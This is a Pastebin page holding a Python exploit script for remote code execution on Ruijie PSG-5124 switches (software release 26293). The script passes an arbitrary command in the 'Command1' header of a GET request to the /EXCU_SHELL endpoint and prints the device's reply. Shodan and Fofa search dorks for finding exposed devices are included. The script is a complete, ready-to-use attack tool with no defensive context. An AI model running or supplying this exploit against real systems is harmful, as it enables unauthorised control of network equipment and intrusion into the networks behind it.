Advertisement
FlyFar

Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)

Mar 14th, 2024
647
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.85 KB | Cybersecurity | 0 0
  1. #- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
  2. #- Shodan Dork: http.html_hash:-1402735717
  3. #- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
  4. #- Exploit Author: ByteHunter
  5. #- Email: 0xByteHunter@proton.me
  6. #- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
  7. #- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)
  8.  
  9. import http.client
  10. import argparse
  11.  
  12. def send_request(ip, port, command):
  13.     headers = {
  14.         "Host": f"{ip}:{port}",
  15.         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
  16.         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
  17.         "Accept-Language": "en-US,en;q=0.5",
  18.         "Accept-Encoding": "gzip, deflate, br",
  19.         "DNT": "1",
  20.         "Connection": "close",
  21.         "Upgrade-Insecure-Requests": "1",
  22.         "Cmdnum": "1",
  23.         "Confirm1": "n",
  24.         "Content-Length": "0",
  25.         "Command1": command
  26.     }
  27.  
  28.     try:
  29.         connection = http.client.HTTPConnection(f"{ip}:{port}")
  30.         connection.request("GET", "/EXCU_SHELL", headers=headers)
  31.         response = connection.getresponse()
  32.  
  33.        
  34.         print(f"Status Code: {response.status}")
  35.         print(response.read().decode('utf-8'))
  36.         connection.close()
  37.  
  38.     except Exception as e:
  39.         print(f"Request failed: {e}")
  40.  
  41. if __name__ == "__main__":
  42.  
  43.     parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
  44.     parser.add_argument('--ip', help='Target IP address', required=True)
  45.     parser.add_argument('--port', help='Port', required=True)
  46.     parser.add_argument('--cmd', help='Command', required=True)
  47.     args = parser.parse_args()
  48.  
  49.  
  50.     ip = args.ip
  51.     port = args.port
  52.     command = args.cmd
  53.  
  54.  
  55.     send_request(ip, port, command)
  56.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement